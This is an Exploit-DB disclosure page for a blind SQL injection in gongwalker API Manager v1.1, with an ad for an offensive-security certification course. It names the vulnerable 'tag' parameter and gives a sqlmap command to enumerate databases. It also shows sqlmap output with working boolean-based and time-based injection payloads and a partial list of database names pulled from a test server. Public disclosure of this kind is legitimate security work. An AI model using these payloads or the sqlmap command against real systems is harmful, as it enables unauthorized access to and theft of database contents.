Gongwalker API Manager 1.1 - Blind SQL Injection

EDB-ID:

39320

CVE:

N/A


Author:

HaHwul

Type:

webapps


Platform:

PHP

Date:

2016-01-26


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

gongwalker API Manager v1.1 - Blind SQL Injection

# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection
# Date: 2016-01-25
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/gongwalker/ApiManager
# Software Link: https://github.com/gongwalker/ApiManager.git
# Version: v1.1
# Tested on: Debian

# =================== Vulnerability Description =================== #
Api Manager's index.php used tag parameters is vulnerable
http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1

# ========================= SqlMap Query ========================== #
sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag

# ================= SqlMap Result(get My Test DB) ================= #
Parameter: tag (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF
---
[21:14:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.11
[21:14:21] [INFO] fetching database names
[21:14:21] [INFO] fetching number of databases
[21:14:21] [INFO] resumed: 25
[21:14:21] [INFO] resumed: information_schema
[21:14:21] [INFO] resumed: "
[21:14:21] [INFO] resumed: ""
[21:14:21] [INFO] resumed: '
[21:14:21] [INFO] resumed: ''
[21:14:21] [INFO] resumed: '''
[21:14:21] [INFO] resumed: api
[21:14:21] [INFO] resumed: blackcat
[21:14:21] [INFO] resumed: edusec

...